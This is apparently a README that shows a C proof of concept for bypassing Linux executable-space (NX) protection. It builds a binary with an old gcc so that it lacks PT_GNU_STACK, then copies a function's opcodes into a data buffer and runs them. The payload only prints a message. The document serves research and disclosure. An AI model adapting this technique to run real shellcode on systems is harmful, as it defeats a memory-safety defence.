README.md
Rendering markdown...
/**
* @file demo.c
* @author x0reaxeax
* @brief executable-space protection bypass POC
* @date 2022-02-16
*
* @copyright Copyright (c) x0reaxeax 2022
*
* This POC demonstrates execution of bytes
* located in supposedly non-executable region of binary,
* therefore completely bypassing executable-space protection.
*
* The root cause of this can be found here:
* https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/elf.h#L280
*
* As it turns out, binary files built on either
* systems lacking NX or IA32 systems with NX,
* which do NOT contain the `PT_GNU_STACK` header
* will be marked with `exec-all`.
*
* This allows complete for RWX to/from everywhere in the binary.
*
* To achieve this, we use "historical" building tools.
* In this case, gcc 3.2.2 running on x86 Slackware9 with Linux 2.4.20
* We will end up with a binary file which we can run on modern Linux
* systems, in this case Linux 5.16.1
*
* Building:
*
* `gcc -nostdlib -o demo32 demo.c`
*
* The following code will copy assembled bytes of function `dummy()`
* to character array `harmless_str_buf` and execute the destination array as function.
*
*
* *** DISCLAIMER ***
* This demonstration serves completely for educational purposes.
* Under no circumstances can the author of this code be held responsible
* for any direct or indirect damage caused by misusing provided code and/or information.
* MIT License
*
* Copyright (c) 2022 x0reaxeax
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*/
#define NULL ((void *) 0)
#define POC
#define BUFSIZE 128
char str[] = "noexec bypassed!\n";
/**
* This buffer will be loaded with dummy()'s opcodes
*/
char harmless_str_buf[BUFSIZE] = "xrandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomx";
/**
* dummy function - target shellcode
* opcodes of this function will be copied to harmless_str_buf.
* included for ease of POC demonstration
*/
void dummy(void) {
__asm__ volatile (
".intel_syntax noprefix;"
"mov eax, 4;" /* sys_write */
"mov ebx, 1;" /* stdout */
"mov ecx, %[str];"
"mov edx, 17;" /* strlen */
"int 0x80;" /* syscall */
"int3;" /* boundary */
".att_syntax;"
:: [str] "r" (str)
: "eax", "ebx", "ecx", "edx"
);
}
/**
* copies opcodes from `dummy()` to destination buf
*/
void (*copy_opcodes(unsigned char *output, unsigned int bufsiz)) (void) {
unsigned int i = 0;
unsigned char *dummy_ptr = (unsigned char *) dummy;
for (i = 0; i < bufsiz; i++) {
unsigned char opcode = *(dummy_ptr + i);
output[i] = opcode;
if (opcode == 0xcc) {
/* boundary hit */
break;
}
}
return (void (*)()) output;
}
int _start(void) {
#ifdef POC /* execute opcodes in harmless_str_buf */
void (*pfunc)() = NULL;
pfunc = copy_opcodes(harmless_str_buf, BUFSIZE);
pfunc();
#else /* execute dummy() to demonstrate it's purpose */
dummy();
#endif
return 0; /* segfault */
}